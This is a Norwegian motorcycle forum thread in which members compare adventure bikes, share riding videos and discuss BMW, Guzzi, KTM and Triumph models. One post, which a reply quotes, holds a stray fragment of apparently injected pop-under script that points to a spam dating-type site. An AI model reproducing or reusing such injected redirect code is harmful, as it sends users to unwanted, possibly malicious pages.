Den store forumtråden om adventure motorsykler og tureventyr MC'er!

Forum for fulleffekt tung-MC
Svar
Brukeravatar
Bringisen
Innlegg: 1725
Registrert: 15 des 2010, 16:47
Motorsykkelen din: BMW R1200GS 2014
Sted: Bergen

Re: MCsidens store tråd om eventyr- og reiseendurosykler!

Legg inn av Bringisen »

JRO skrev:
ojda skrev:
ZZR-Erling skrev:Det er jo viktig å finne sin bike, og den er jo nødvendigvis ikke testvinner eller spesielt populær, men best for deg! Jeg leser tester nøye, men prøver å trekke ut det som jeg lurer på og jeg vektlegger. Skal bildet bli mest mulig korrekt, basert på andres tester, må man lese mange tester. Prøvekjøring vilalikevel sette prikken over i'en.
Jeg har heller ikke problem med å si at BMW ikke alltid leverer spesielt gode biker, og at min klare oppfatning er at første, andre og sågar tredje års utgave, er heller frynsete hos noen modeller.
Det var vel det som var finest med å gå "gravid" med ny sykkel over et halvt år, før man fikk mulighet
til å sitte og å kjøre med den, mens omtaler og tester haglet inn.
Jeg hadde helt klare forventninger til hva nyskapningen skulle være basert på de testene, og ved en lengre prøvekjøring kunne jeg bare huke av punkt etter punkt som var som forventet eller overrasket positivt.
Etter det gjorde jeg vel en feil, ved å ikke fortsette å prøve de andre syklene i klassen.
Men basert på senere prøvekjøringer ville resultatet vert det samme.
En del av utvelgelsen ble jo også basert på likes/dislikes av utseende av detaljer.
Jeg kunne nesten like gjerne kjørt:
En BMW med mindre vibrasjoner.
En Yamaha med sterkere motor og penere instrumenter.
En MotoGuzzi med penere front.
En Ducati jeg hadde tro på å kunne beholde lappen på. :P :p
Følger deg veldig på før opplevelsen Ojda, valget av sykkel, bestilling av ny sykkel, venting på at sykkelen skal komme, og til sist reise ned for å hente. Husker det som det var i går, heldig var jeg at flere fra MCsiden også valgte å møte opp på den store dagen. Her er nok et av mine største øyeblikk som mc kjører.

Bilde

Men vi som mennesker søker nok bekreftelser på at valget vi har gjort er fornuftig og riktig. Mange søker denne bekreftelsen gjennom tester og kommentarer fra forumer verden rundt, men jeg er nok mer i Ojda's verden hvor egen tilfredstillelse er nok. Nye sykler i samme segment som Adventure er nok i det store og hele ganske like. Det er små forskjeller som skiller disse syklene. Så personlige preferanser er det som for hver av oss gjør at vi velger litt forskjellig. Når vi er så heldige at vi har mulighet til å kjøpe en ny mc til mer enn 200 000, så klart at vi er sikre på at valget vi har gjort er det helt riktige.
Og leser man nøye de siste innleggene i denne tråden så er jo vi alle ganske så enig i dette. Ser egentlig ikke helt om dette er et problem. Forskjellene ligger i hva som gjør oss tilfredstilte og det viktigste er at det heldigvis finnes muligheter for alle å bli tilfredstilte.
Akkurat nå er jeg så tilfredstilt at jeg er på bristepunktet :-)å
Måtte det bli vår fortere enn svint :P :p
2014 BMW R1200GS, Farge: Bluefire, m/ Dynamic ESA II, Aktiv fjæring DDC, Automatic Stability Control ASC , Digital Traction Control DTC, Cruice kontroll , Dekktrykksovervåking ,ABS Pro , LED Hovedlys , Dagslys kjørelys , LED Ekstralykter , Kjørecomputer Pro , LED Blinklys , Tyverialarm , BMW Navigator V , BMW Veltebøyle , Touratech øvre veltebøyle , BMW Motorbeskyttelse , GIVI Trekker sorte Alu-vesker m/tilbehør , Krom Eksosrør , Varmeholker og Håndtakbeskyttere.

Brukeravatar
KydeX
Innlegg: 546
Registrert: 04 jul 2012, 13:23
Motorsykkelen din: Honda VFR1200F

Re: MCsidens store tråd om eventyr- og reiseendurosykler!

Legg inn av KydeX »

Til de som mener at man er nødt til å ha en GS1200 eller tilsvarende for å kjøre et par grusveier i året, sjekk ut denne galningen på en FJR1300 :knegg

https://www.youtube.com/watch?v=XWng5pEtgkg

Brukeravatar
biker7
Innlegg: 1304
Registrert: 12 feb 2011, 15:41
Motorsykkelen din: BMW R1250GS HP, Honda NX650 Dominator
Sted: solør

Re: MCsidens store tråd om eventyr- og reiseendurosykler!

Legg inn av biker7 »

KydeX skrev:Til de som mener at man er nødt til å ha en GS1200 eller tilsvarende for å kjøre et par grusveier i året, sjekk ut denne galningen på en FJR1300 :knegg

https://www.youtube.com/watch?v=XWng5pEtgkg
Bevis på at med oppreist kjørestilling så kan man komme seg fram på de utroligste plasser. Måtte jo velte litt da men. :roll Hadde nok ikke gått så mye bedre med en stor,tung GS1200, Explorer, SuperTenere etc skal du se. :sk? Men ville nok ikke prøvd dette med kjørestillingen på en R-sykkel. :-)å
MEN tenk hvor artig han kunne ha hatt det på disse veiene/stiene med en mye lettere endunker feks. Sladding, grus-spruting etc. Det er jo DET som er artig :thumleft :prop:
Mine tidligere og nåværende "hjul-beinte" kamerater er:

-20 BMW R1250GS HP (2021-...) (Nåværende)
-89 Honda NX 650 Dominator (2008 -...) (Nåværende)
-09 BMW F800GS (2019-2021)
-01 Kawasaki ZX9R (2020-2021)
-16 Yamaha MT09 Tracer (2016-2020)
-03 Kawasaki ZX12R (2013-2016)
-99 Kawasaki ZX9R (2010-2013)
-98 Triumph Daytona T595 (955i) (2006-2010)
-93 suzuki GSXR1100 (2002-2006)
-99 suzuki GSXR600 (1999-2002)
-95 kawasaki ZX6R (1998-1999)
-86 suzuki GSX750es (1996-1998)
-83 Honda MT5, 50 ccm (1987-1990)
-58 Tempo Corvette, 5o ccm (1985-1987)

Brukeravatar
Kmann
Innlegg: 504
Registrert: 27 jul 2011, 13:00
Motorsykkelen din: BMW R1150GS -00, BMW K100 RT-85
Sted: Grue i Hedmark

Re: MCsidens store tråd om eventyr- og reiseendurosykler!

Legg inn av Kmann »

KydeX skrev:Til de som mener at man er nødt til å ha en GS1200 eller tilsvarende for å kjøre et par grusveier i året, sjekk ut denne galningen på en FJR1300 :knegg

https://www.youtube.com/watch?v=XWng5pEtgkg
Hadde han stålet sykkelen ??
Mange som kjører MC, liker det ikke, de kjører fort for å bli fort ferdige med turen.....??
2014 Pr 01.10: 10000 km 01.11: 12000 km

Brukeravatar
Bringisen
Innlegg: 1725
Registrert: 15 des 2010, 16:47
Motorsykkelen din: BMW R1200GS 2014
Sted: Bergen

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av Bringisen »

Det har vel blitt sagt før, det er ikke snakk om hva man blir nødt til, eller hva som er mulig.

Er vel heller hva som er mest gunstig :thumleft
2014 BMW R1200GS, Farge: Bluefire, m/ Dynamic ESA II, Aktiv fjæring DDC, Automatic Stability Control ASC , Digital Traction Control DTC, Cruice kontroll , Dekktrykksovervåking ,ABS Pro , LED Hovedlys , Dagslys kjørelys , LED Ekstralykter , Kjørecomputer Pro , LED Blinklys , Tyverialarm , BMW Navigator V , BMW Veltebøyle , Touratech øvre veltebøyle , BMW Motorbeskyttelse , GIVI Trekker sorte Alu-vesker m/tilbehør , Krom Eksosrør , Varmeholker og Håndtakbeskyttere.

Brukeravatar
poulet_cavalier
Innlegg: 1272
Registrert: 25 feb 2012, 21:55
Motorsykkelen din: R1200GS
Sted: Asker

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av poulet_cavalier »

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
FLICKR: https://www.flickr.com/photos/132823894@N04/
Be silent, or say something better than silence
-Pythagoras

Brukeravatar
ojda
Innlegg: 5632
Registrert: 19 sep 2010, 02:06
Motorsykkelen din: TRIUMPH TIGER EXPLORER 1200.
Sted: Oslo

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av ojda »

poulet_cavalier skrev:');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
1 time og 40 minutter :eh
Nå blir hu mor sur, men det fåkke hjælpe :lol
Takk for kllippet :thumleft
Kjørt i 2014: 24323km. (v-68752) På`n igjen :-)
Kjørt i 2013:25179km. Kjørt til 21/9. Å dett var dett :-(
Kjørt i 2012:19250km D æ mer morro med ny sykkel ;-))
Kjørt i 2011:..9000km


Sendt fra min I-Pad. Nyladet med brunt skinnetui![/size]

Brukeravatar
Busa Trond
Innlegg: 2737
Registrert: 23 sep 2010, 20:58
Motorsykkelen din: BMW R1200GSA 2016

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av Busa Trond »

ojda skrev:
1 time og 40 minutter :eh
Nå blir hu mor sur, men det fåkke hjælpe :lol
Takk for kllippet :thumleft
Ikke tenk så mye på a mor ojda :mk
Dette lærte jeg deg jo på siste PreHøstTur :P :p

Brukeravatar
Bringisen
Innlegg: 1725
Registrert: 15 des 2010, 16:47
Motorsykkelen din: BMW R1200GS 2014
Sted: Bergen

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av Bringisen »

Kom over denne "adventure-filmen" , flott natur og nydelige maskiner som varer og varer

2014 BMW R1200GS, Farge: Bluefire, m/ Dynamic ESA II, Aktiv fjæring DDC, Automatic Stability Control ASC , Digital Traction Control DTC, Cruice kontroll , Dekktrykksovervåking ,ABS Pro , LED Hovedlys , Dagslys kjørelys , LED Ekstralykter , Kjørecomputer Pro , LED Blinklys , Tyverialarm , BMW Navigator V , BMW Veltebøyle , Touratech øvre veltebøyle , BMW Motorbeskyttelse , GIVI Trekker sorte Alu-vesker m/tilbehør , Krom Eksosrør , Varmeholker og Håndtakbeskyttere.

Brukeravatar
AJ
Administrator
Innlegg: 38175
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av AJ »

Artig filmsnut :thumleft

Som for øvrig gir meg lyst til å beholde sykker'n jeg har nå har lenge, for å få samme patinaen på den som syklene på videoen.
Ingen særlig tvil om at karene i denne filmen virkelig elsker sine noe tilårskomne sykler, med preg av alder hvor MC-gleden gjenspeiles tydelig og blir bare bedre og bedre i all sin enkelhet og årsverdighet - omtrent som godt lagret vin... :prf
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
L-NA
Innlegg: 813
Registrert: 02 okt 2012, 01:12
Motorsykkelen din: Moto Guzzi 1200 Stelvio NTX -2014

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av L-NA »

AJ skrev:Artig filmsnut :thumleft

Som for øvrig gir meg lyst til å beholde sykker'n jeg har nå har lenge, for å få samme patinaen på den som syklene på videoen.
Ingen særlig tvil om at karene i denne filmen virkelig elsker sine noe tilårskomne sykler, med preg av alder hvor MC-gleden gjenspeiles tydelig og blir bare bedre og bedre i all sin enkelhet og årsverdighet - omtrent som godt lagret vin... :prf
Jeg har siste tiden lekt med tanken om å kanskje bytte gamle Guzzi'n i en nyere ADV sykkel, og har i den forbindelse lest, tenkt og sette på flere alternativer. Og uten tvil så finnes det mange fantastisk gode alternativer. Og jeg har vert innom både Ducati'n, KTM, Yamaha, Explorer'n, Aprillia,, ....og tilbake til Stelvio. Men selv ved bruk av påtvunget åpent sinn, så havner jeg tilbake på Guzzi'n :scratch ikke det at den er så forb...mye bedre en noen av de andre, nei....men likevel...Jævl....bra :-) Og det er "pakken" Stelvio som tiltaler meg. Mulitsrrada- fantastisk sykkel..men for mye R, og for mye elektronikk, KTM....Nei blir neppe noe særlig med kjøring utenom normal dårlig Norsk asfalt... Super Tener'n. Frister med sin solide kvalitet, og nå litt "oppsprita" i forrhold til eldre modeller - Ja..men... liker bedre moment kurver, design etc. på Stelvio'n .....Explorer - dritt fin sykkel, liker designet, og litt mer motor skader nå ikke men...får litt kritikk for sitte stilling, og stelvio'n er jo fantastisk i det henseende...hadde vert morsomt og prøvd den trippelen, men bytte bort den langstilte luftavkjølte V-Twin....naii tror ikke det. Aprillia..hmmm...nai ikke den heller. Bra på alle måter, men sammenlignet direkte med Guzzien så ser jeg ingen ting som tiltaler meg mer en det som Stelvioen allerede gjør, bortsett fra en del på pluss siden - i Stelvio sin favør....og når jeg da ser på hva jeg får for gode 100 000,- ekstra, med å kjøpe en ny 2015 mod Stelvio, sammenlignet med det jeg har :scratch Så ender jeg opp med samme konklusjon som AJ gjør.

Og min god venn som allerede står klar i garasjen og venter på at jeg skal komme hjem fra havet, og det skal bli sommerferie....omtrent som godt lagret vin..... Han er trygg en stund enda.....Jeg gler meg :thumleft :-)

Brukeravatar
Snikendeugle
Innlegg: 3617
Registrert: 10 apr 2013, 19:32
Motorsykkelen din: MV Agusta F3 800 RC 2018
Sted: Oslo

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av Snikendeugle »

Jeg bare sikler og gleder meg til neste år jeg... :)

Bilde
MV Agusta F3 800 Reparto Corse 2018
Tidl.: KTM RC 390 2015, KTM Duke 690 2013

Brukeravatar
Snikendeugle
Innlegg: 3617
Registrert: 10 apr 2013, 19:32
Motorsykkelen din: MV Agusta F3 800 RC 2018
Sted: Oslo

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av Snikendeugle »

BMW S1000 Adventure? Høres ut som en Multistrada konkurrent ;)

Bilde
https://www.advpulse.com/adv-bikes/new- ... s1000-adv/
MV Agusta F3 800 Reparto Corse 2018
Tidl.: KTM RC 390 2015, KTM Duke 690 2013

LordShaft
Innlegg: 6860
Registrert: 31 aug 2010, 00:17
Motorsykkelen din: KTM 1290 Super Adventure
Sted: Bergen
Kontakt:

Re: Sv: MCsidens store tråd om eventyr/adventure- og reiseen

Legg inn av LordShaft »

Snikendeugle skrev:BMW S1000 Adventure? Høres ut som en Multistrada konkurrent ;)

Bilde
https://www.advpulse.com/adv-bikes/new- ... s1000-adv/
Her snakker vi saker.... Blir veldig spennende å se hvordan denne ender opp :-P

Sony Z2

Brukeravatar
maglil
Innlegg: 105
Registrert: 16 feb 2011, 22:24
Motorsykkelen din: Yamaha MT-09 SP 2021
Sted: Lillestrøm

Re: MCsidens store tråd om eventyr/adventure- og reiseenduro

Legg inn av maglil »

Jeg har siste tiden lekt med tanken om å kanskje bytte gamle Guzzi'n i en nyere ADV sykkel, og har i den forbindelse lest, tenkt og sette på flere alternativer. Og uten tvil så finnes det mange fantastisk gode alternativer. Og jeg har vert innom både Ducati'n, KTM, Yamaha, Explorer'n, Aprillia,, ....
Det er ikke noe dårlig alternativ dette heller :D . Utrolig moro å "leke" litt utenfor asfalterte veier ;-) :thumleft

[img]http://i997.photobucket.com/albums/af99 ... e7d795.jpg[/img]

Maglil

13350 km. i 2013
8750 km i 2012

"Life is what happens to you while you're busy making other plans."

X- 86-Yamaha XJ700 Maxim
X- 97-Yamaha XJR 1200
Nå-2012 Yamaha XT1200Z SuperTenere WorldCrosser

Svar